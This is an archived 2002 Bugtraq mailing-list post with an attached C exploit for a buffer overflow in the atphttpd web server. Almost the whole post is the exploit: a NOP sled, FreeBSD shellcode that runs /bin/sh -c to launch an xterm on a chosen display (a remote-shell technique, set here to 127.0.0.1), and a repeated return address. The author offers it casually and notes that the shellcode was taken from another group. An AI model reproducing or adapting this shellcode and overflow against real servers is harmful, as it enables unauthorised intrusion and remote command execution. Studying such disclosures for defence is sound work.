[26167] in bugtraq

home help back first fref pref prev next nref lref last post

Re: Multiple vulnerabilities in atphttpd-0.4b

daemon@ATHENA.MIT.EDU (badc0ded@badc0ded.com)
Sun Jul 14 23:28:25 2002

Message-ID: <000c01c221a3$49fc1bc0$0892c6c3@rtwts0anprggri>
From: <badc0ded@badc0ded.com>
To: <bugtraq@securityfocus.com>
Date: Tue, 2 Jul 2002 01:34:30 -0700
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0009_01C22168.9C8BACB0"

------=_NextPart_000_0009_01C22168.9C8BACB0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Attached is an exploit for the atphttpd vuln. 


YES! I'm really bored....



------=_NextPart_000_0009_01C22168.9C8BACB0
Content-Type: application/octet-stream;
	name="atp-exploit.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
	filename="atp-exploit.c"

/* atphttpd exploit.
 / The exploit sucks, if you get it wrong the first time the server just =
dies
 / so I didnt bother adding any offset argument to the exploit. Also if =
you=20
 / change the IP addy you may have to change the alignment a little.  =20
 /
 / http://www.badc0ded.com=20
*/

#define ret "\x78\xf5\xbf\xbf"
char FreeBSD[]=3D		 /* stolen lsd-pl.net shellcode	   */  =09
  "\xeb\x25"             /* jmp     <cmdshellcode+39>      */
  "\x59"                 /* popl    %ecx                   */
  "\x31\xc0"             /* xorl    %eax,%eax              */
  "\x50"                 /* pushl   %eax                   */
  "\x68""//sh"           /* pushl   $0x68732f2f            */
  "\x68""/bin"           /* pushl   $0x6e69622f            */
  "\x89\xe3"             /* movl    %esp,%ebx              */
  "\x50"                 /* pushl   %eax                   */
  "\x66\x68""-c"         /* pushw   $0x632d                */
  "\x89\xe7"             /* movl    %esp,%edi              */
  "\x50"                 /* pushl   %eax                   */
  "\x51"                 /* pushl   %ecx                   */
  "\x57"                 /* pushl   %edi                   */
  "\x53"                 /* pushl   %ebx                   */
  "\x89\xe7"             /* movl    %esp,%edi              */
  "\x50"                 /* pushl   %eax                   */
  "\x57"                 /* pushl   %edi                   */
  "\x53"                 /* pushl   %ebx                   */
  "\x50"                 /* pushl   %eax                   */
  "\xb0\x3b"             /* movb    $0x0b,%al              */
  "\xcd\x80"             /* int     $0x80                  */=20
  "\xe8\xd6\xff\xff\xff" /* call    <cmdshellcode+2>       */
  "/usr/X11R6/bin/xterm -display 127.0.0.1:0;";

main ()
{
  int i;
  for (i=3D0;i<=3D501;i++) // this would be a good place to change =
alignment
    printf("\x90");
  printf("%s",FreeBSD);
  for (i=3D0;i<=3D100;i++)=20
    printf("%s",ret);
  printf("\n\n");
}

------=_NextPart_000_0009_01C22168.9C8BACB0--
home help back first fref pref prev next nref lref last post